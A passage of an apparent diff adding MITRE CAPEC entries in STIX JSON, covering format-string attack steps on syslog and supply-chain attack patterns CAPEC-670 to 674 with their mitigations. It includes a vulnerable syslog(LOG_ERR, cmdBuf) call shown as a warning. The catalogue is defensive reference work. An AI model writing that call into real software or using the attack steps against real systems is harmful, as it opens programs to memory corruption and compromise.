  2. Craft overflow content: The adversary crafts the content to be injected. If the intent is to simply cause the software to crash, the content need only consist of an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary will craft a set of content that not only overflows the targeted buffer but does so in such a way that the overwritten return address is replaced with one of the adversaries' choosing which points to code injected by the adversary.

    3. Techniques
    The formatting characters %s and %d are useful for observing memory and trying to print memory addresses. If an adversary has access to the log being written to they can observer this output and use it to help craft their attack.
    The formatting character %n is useful for adding extra data onto the buffer.

Exploit

  1. Overflow the buffer: Using the injection vector, the adversary supplies the program with the crafted format string injection, causing a buffer.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The Syslog function is used without specifying a format string argument, allowing user input to be placed direct into the function call as a format string." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n The code should be reviewed for misuse of the Syslog function call. Manual or automated code review can be used. The reviewer needs to ensure that all format string functions are passed a static string which cannot be controlled by the user and that the proper number of arguments are always sent to that function as well. If at all possible, do not use the %n operator in format strings. The following code shows a correct usage of Syslog():\n syslog(LOG_ERR, \"%s\", cmdBuf);\n The following code shows a vulnerable usage of Syslog():\n syslog(LOG_ERR, cmdBuf);\n // the buffer cmdBuff is taking user supplied data.\n \n \n ", + "id": "course-of-action--86561398-227b-435c-a522-9d43f3d2e16f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-67-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--72cfbe83-9260-4542-948f-17b8e7b1a1df", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--86561398-227b-435c-a522-9d43f3d2e16f", + "spec_version": "2.1", + "target_ref": "attack-pattern--4cd18074-15c1-4206-8391-115685669623", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary with the ability to alter tools used in a development environment causes software to be developed with maliciously modified tools. Such tools include requirements management and database tools, software design tools, configuration management tools, compilers, system build tools, and software performance testing and load testing tools. The adversary then carries out malicious acts once the software is deployed including malware infection of other systems to support further compromises.", + "external_references": [ + { + "external_id": "CAPEC-670", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/670.html" + }, + { + "description": "Trusted Developer Utilities Proxy Execution", + "external_id": "T1127", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1127" + }, + { + "description": "Supply Chain Compromise: Compromise Software Dependencies and Development Tools", + "external_id": "T1195.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/001" + }, + { + "description": "Melinda Reed, John F. Miller, Paul Popick, Supply Chain Attack Patterns: Framework and Catalog, 2014--08, Office of the Assistant Secretary of Defense for Research and Engineering", + "external_id": "REF-660", + "source_name": "reference_from_CAPEC", + "url": "https://docplayer.net/13041016-Supply-chain-attack-patterns-framework-and-catalog.html" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor, 2020--12---13, Schneier on Security", + "external_id": "REF-667", + "source_name": "reference_from_CAPEC", + "url": "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html" + } + ], + "id": "attack-pattern--14ed805a-65a4-45c2-8e4e-626f22226465", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Software Development Tools Maliciously Altered", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--69b5d398-114d-437d-a8db-06f1382012b7" + ], + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Modify Data", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Software" + ], + "x_capec_example_instances": [ + "An adversary with access to software build tools inside an Integrated Development Environment IDE alters a script used for downloading dependencies from a dependent code repository where the script has been changed to include malicious code implanted in the repository by the adversary." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An adversary would need to have access to a targeted developer’s development environment and in particular to tools used to design, create, test and manage software, where the adversary could ensure malicious code is included in software packages built through alteration or substitution of tools in the environment used in the development of software." + ], + "x_capec_skills_required": { + "High": "Ability to leverage common delivery mechanisms (e.g., email attachments, removable media) to infiltrate a development environment to gain access to software development tools for the purpose of malware insertion into an existing tool or replacement of an existing tool with a maliciously altered copy." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Have a security concept of operations (CONOPS) for the development environment that includes: Maintaining strict security administration and configuration management of requirements management and database tools, software design tools, configuration management tools, compilers, system build tools, and software performance testing and load testing tools.", + "id": "course-of-action--eac781ab-b6c7-461d-8b6b-bef86f30b33a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-670-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--811480e0-f4e5-4e2a-8c32-b4c4872290a1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--eac781ab-b6c7-461d-8b6b-bef86f30b33a", + "spec_version": "2.1", + "target_ref": "attack-pattern--14ed805a-65a4-45c2-8e4e-626f22226465", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Avoid giving elevated privileges to developers.", + "id": "course-of-action--b2679adf-476c-4be7-b2ea-c1cb155f9145", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-670-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--59b5ad85-0960-462a-b666-4bbdcb872db3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b2679adf-476c-4be7-b2ea-c1cb155f9145", + "spec_version": "2.1", + "target_ref": "attack-pattern--14ed805a-65a4-45c2-8e4e-626f22226465", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary with access to functional requirements for an application specific integrated circuit (ASIC), a chip designed/customized for a singular particular use, maliciously alters requirements derived from originating capability needs. In the chip manufacturing process, requirements drive the chip design which, when the chip is fully manufactured, could result in an ASIC which may not meet the user’s needs, contain malicious functionality, or exhibit other anomalous behaviors thereby affecting the intended use of the ASIC.", + "external_references": [ + { + "external_id": "CAPEC-671", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/671.html" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + } + ], + "id": "attack-pattern--5af917a8-becc-41ec-9053-6976a9da5b28", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Requirements for ASIC Functionality Maliciously Altered", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--cf550376-63ac-4b46-87d1-0e324c1c1c46" + ], + "x_capec_consequences": { + "Integrity": [ + "Alter Execution Logic" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Hardware" + ], + "x_capec_example_instances": [ + "An adversary with access to ASIC functionality requirements for various customers, targets a particular customer’s ordered lot of ASICs by altering its functional requirements such that the ASIC design will result in a manufactured chip that does not meet the customer’s capability needs." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An adversary would need to have access to a foundry’s or chip maker’s requirements management system that stores customer requirements for ASICs, requirements upon which the design of the ASIC is based." + ], + "x_capec_skills_required": { + "High": "An adversary would need experience in designing chips based on functional requirements in order to manipulate requirements in such a way that deviations would not be detected in subsequent stages of ASIC manufacture and where intended malicious functionality would be available to the adversary once integrated into a system and fielded." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Utilize DMEA’s (Defense Microelectronics Activity) Trusted Foundry Program members for acquisition of microelectronic components.", + "id": "course-of-action--78bdd0d5-c5e0-4465-a8e8-2a5245673b43", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-671-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0acfa1e9-0c32-4214-b7e0-8051b944e4f1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--78bdd0d5-c5e0-4465-a8e8-2a5245673b43", + "spec_version": "2.1", + "target_ref": "attack-pattern--5af917a8-becc-41ec-9053-6976a9da5b28", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that each supplier performing hardware development implements comprehensive, security-focused configuration management including for hardware requirements and design.", + "id": "course-of-action--763090ea-507b-4958-869c-ecfd797d6d26", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-671-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2b255e16-36f0-474d-bfe4-bd6900df7834", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--763090ea-507b-4958-869c-ecfd797d6d26", + "spec_version": "2.1", + "target_ref": "attack-pattern--5af917a8-becc-41ec-9053-6976a9da5b28", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Require that provenance of COTS microelectronic components be known whenever procured.", + "id": "course-of-action--bbe1a74c-b985-4607-a7aa-6a9cbf724b87", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-671-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--016cf7ce-9d06-49b6-9680-5f0585b9d9c8", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bbe1a74c-b985-4607-a7aa-6a9cbf724b87", + "spec_version": "2.1", + "target_ref": "attack-pattern--5af917a8-becc-41ec-9053-6976a9da5b28", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Conduct detailed vendor assessment before acquiring COTS hardware.", + "id": "course-of-action--0b60f2ad-a597-4f6d-8433-af47d2743270", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-671-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f207532a-5fc8-4c50-a7ee-cacc0092f6d7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0b60f2ad-a597-4f6d-8433-af47d2743270", + "spec_version": "2.1", + "target_ref": "attack-pattern--5af917a8-becc-41ec-9053-6976a9da5b28", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n During the programming step of chip manufacture, an adversary with access and necessary technical skills maliciously alters a chip’s intended program logic to produce an effect intended by the adversary when the fully manufactured chip is deployed and in operational use. Intended effects can include the ability of the adversary to remotely control a host system to carry out malicious acts.\n ", + "external_references": [ + { + "external_id": "CAPEC-672", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/672.html" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + }, + { + "description": "Jeremy Muldavin, Assuring Microelectronics Innovation for National Security & Economic Competitiveness (MINSEC), 2017--11, Office of the Deputy Assistant Secretary of Defense for Systems Engineering", + "external_id": "REF-662", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--2150c989-e9a0-4aef-8019-8d60f6fcaeeb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Malicious Code Implanted During Chip Programming", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_consequences": { + "Integrity": [ + "Alter Execution Logic" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n Following a chip’s production process steps of test and verification and validation of chip circuitry, an adversary involved in the generation of microcode defining the chip’s function(s) inserts a malicious instruction that will become part of the chip’s program. When integrated into a system, the chip will produce an effect intended by the adversary.\n " + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An adversary would need to have access to a foundry’s or chip maker’s development/production environment where programs for specific chips are developed, managed and uploaded into targeted chips prior to distribution or sale." + ], + "x_capec_skills_required": { + "Medium": "An adversary needs to be skilled in microprogramming, manipulation of configuration management systems, and in the operation of tools used for the uploading of programs into chips during manufacture. Uploading can be for individual chips or performed on a large scale basis." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--28128c02-5503-416d-842c-89eb9c15bd31", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--78bdd0d5-c5e0-4465-a8e8-2a5245673b43", + "spec_version": "2.1", + "target_ref": "attack-pattern--2150c989-e9a0-4aef-8019-8d60f6fcaeeb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that each supplier performing hardware development implements comprehensive, security-focused configuration management of microcode and microcode generating tools and software.", + "id": "course-of-action--1033b942-9114-4d36-9d75-7b3b3f7b9186", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-672-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--89691446-aa5b-4b3c-9328-d26c0db95284", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1033b942-9114-4d36-9d75-7b3b3f7b9186", + "spec_version": "2.1", + "target_ref": "attack-pattern--2150c989-e9a0-4aef-8019-8d60f6fcaeeb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--bfab0ef2-0fc0-4e7c-a0a5-2eed4b5e3aa0", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bbe1a74c-b985-4607-a7aa-6a9cbf724b87", + "spec_version": "2.1", + "target_ref": "attack-pattern--2150c989-e9a0-4aef-8019-8d60f6fcaeeb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--02819a54-8939-497c-b2eb-faaac80cabf0", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0b60f2ad-a597-4f6d-8433-af47d2743270", + "spec_version": "2.1", + "target_ref": "attack-pattern--2150c989-e9a0-4aef-8019-8d60f6fcaeeb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n Software produced by a reputable developer is clandestinely infected with malicious code and then digitally signed by the unsuspecting developer, where the software has been altered via a compromised software development or build process prior to being signed. The receiver or user of the software has no reason to believe that it is anything but legitimate and proceeds to deploy it to organizational systems.\n This attack differs from CAPEC-206, since the developer is inadvertently signing malicious code they believe to be legitimate and which they are unware of any malicious modifications.\n ", + "external_references": [ + { + "external_id": "CAPEC-673", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/673.html" + }, + { + "description": "Supply Chain Compromise: Compromise Software Supply Chain", + "external_id": "T1195.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/002" + }, + { + "description": "Defending Against Software Supply Chain Attacks, 2021--04, Cybersecurity and Infrastructure Security Agency (CISA)", + "external_id": "REF-658", + "source_name": "reference_from_CAPEC", + "url": "https://www.cisa.gov/sites/default/files/publications/defending_against_software_supply_chain_attacks_508_1.pdf" + }, + { + "description": "Dr. Charles Clancy, Joe Ferraro, Robert A. Martin, Adam G. Pennington, Christopher L. Sledjeski, Dr. Craig J. Wiener, Deliver Uncompromised: Securing Critical Software Supply Chains, 2021--01, The MITRE Corporation", + "external_id": "REF-659", + "source_name": "reference_from_CAPEC", + "url": "https://www.mitre.org/publications/technical-papers/deliver-uncompromised-securing-critical-software-supply-chains" + } + ], + "id": "attack-pattern--a7061d3b-6f93-440d-8b0d-4078e80eef88", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Developer Signing Maliciously Altered Software", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--69b5d398-114d-437d-a8db-06f1382012b7" + ], + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges", + "Execute Unauthorized Commands" + ], + "Authorization": [ + "Gain Privileges", + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Read Data", + "Modify Data" + ], + "Integrity": [ + "Read Data", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Software" + ], + "x_capec_example_instances": [ + "\n An adversary who has infiltrated an organization’s build environment maliciously alters code intended to be included in a product’s software build via software dependency inclusion, part of the software build process. When the software product has been built, the developer electronically signs the finished product using their signing key. The recipient of the software product, an end user/customer, believes the software to reflect the developer’s intent with respect to functionality unaware of the adversary’s malicious intent harbored within.\n " + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "An adversary would need to have access to a targeted developer’s software development environment, including to their software build processes, where the adversary could ensure code maliciously tainted prior to a build process is included in software packages built." + ], + "x_capec_skills_required": { + "High": "The adversary must have the skills to infiltrate a developer’s software development/build environment and to implant malicious code in developmental software code, a build server, or a software repository containing dependency code, which would be referenced to be included during the software build process." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Have a security concept of operations (CONOPS) for the IDE that includes: Protecting the IDE via logical isolation using firewall and DMZ technologies/architectures; Maintaining strict security administration and configuration management of configuration management tools, developmental software and dependency code repositories, compilers, and system build tools.", + "id": "course-of-action--22c445d7-8a0c-4c4a-82be-e6a3a23980f6", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-673-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8158f676-c4e7-47f8-94d3-fce6ae844da7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--22c445d7-8a0c-4c4a-82be-e6a3a23980f6", + "spec_version": "2.1", + "target_ref": "attack-pattern--a7061d3b-6f93-440d-8b0d-4078e80eef88", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Employ intrusion detection and malware detection capabilities on IDE systems where feasible.", + "id": "course-of-action--a96e3d7b-96fe-4a3c-bc99-11721b0042f7", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-673-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e27a3eac-c3d2-4400-b058-e2708bb41600", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a96e3d7b-96fe-4a3c-bc99-11721b0042f7", + "spec_version": "2.1", + "target_ref": "attack-pattern--a7061d3b-6f93-440d-8b0d-4078e80eef88", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary alters the functionality of a field-programmable gate array (FPGA) by causing an FPGA configuration memory chip reload in order to introduce a malicious function that could result in the FPGA performing or enabling malicious functions on a host system. Prior to the memory chip reload, the adversary alters the program for the FPGA by adding a function to impact system operation.\n ", + "external_references": [ + { + "external_id": "CAPEC-674", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/674.html" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + }, + { + "description": "Melinda Reed, John F. Miller, Paul Popick, Supply Chain Attack Patterns: Framework and Catalog, 2014--08, Office of the Assistant Secretary of Defense for Research and Engineering", + "external_id": "REF-660", + "source_name": "reference_from_CAPEC", + "url": "https://docplayer.net/13041016-Supply-chain-attack-patterns-framework-and-catalog.html" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Jeremy Muldavin, Assuring Microelectronics Innovation for National Security & Economic Competitiveness (MINSEC), 2017--11, Office of the Deputy Assistant Secretary of Defense for Systems Engineering", + "external_id": "REF-662", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--fcd0d50b-dab4-435d-859e-19514b4e646e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Design for FPGA Maliciously Altered", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--cf550376-63ac-4b46-87d1-0e324c1c1c46" + ], + "x_capec_consequences": { + "Integrity": [ + "Alter Execution Logic" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Hardware" + ], + "x_capec_example_instances": [ + "\n An adversary with access and the ability to alter the configuration/programming of FPGAs in organizational systems, introduces a trojan backdoor that can be used to alter the behavior of the original system resulting in, for example, compromise of confidentiality of data being processed.\n " + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An adversary would need to have access to FPGA programming/configuration-related systems in a chip maker’s development environment where FPGAs can be initially configured prior to delivery to a customer or have access to such systems in a customer facility where end-user FPGA configuration/reconfiguration can be performed." + ], + "x_capec_skills_required": { + "High": "An adversary would need to be skilled in FPGA programming in order to create/manipulate configurations in such a way that when loaded into an FPGA, the end user would be able to observe through testing all user-defined required functions but would be unaware of any additional functions the adversary may have introduced." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a4ab3ee8-bb69-4118-8ae0-48c15fa7c16d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--78bdd0d5-c5e0-4465-a8e8-2a5245673b43", + "spec_version": "2.1", + "target_ref": "attack-pattern--fcd0d50b-dab4-435d-859e-19514b4e646e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + 